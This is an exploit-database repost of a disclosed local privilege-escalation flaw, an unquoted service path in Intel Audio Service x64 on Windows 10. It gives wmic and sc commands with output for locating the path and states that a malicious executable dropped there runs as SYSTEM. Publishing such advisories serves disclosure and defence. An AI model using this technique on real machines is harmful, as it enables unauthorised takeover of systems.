Intel(R) Audio Service x64 01.00.1080.0 IntelAudioService Unquoted Service Path

CVE Category Price Severity
CVE-2021-xxxx CWE-428 $500 Critical
Author Risk Exploitation Type Date
Unknown High Local 2021-06-02
Our sensors found this exploit at:

Below is a copy:

Intel(R) Audio Service x64 01.00.1080.0 IntelAudioService Unquoted Service Path
# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
# Date: 06-01-2021
# Exploit Author: Geovanni Ruiz
# Vendor Homepage:
# Software Version: 01.00.1080.0
# File Version: 1.00.1080.0
# Tested on: Microsoft Windows 10 Home Single Language 10.0.19042 x64 es
# Vulnerability Type: Unquoted Service Path

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname

DisplayName             Name               PathName                                                               StartMode  StartName
Intel(R) Audio Service  IntelAudioService  C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "IntelAudioService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: IntelAudioService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Intel(R) Audio Service
        DEPENDENCIAS       :

# 3. Exploit:

To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order
to gain SYSTEM privileges.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum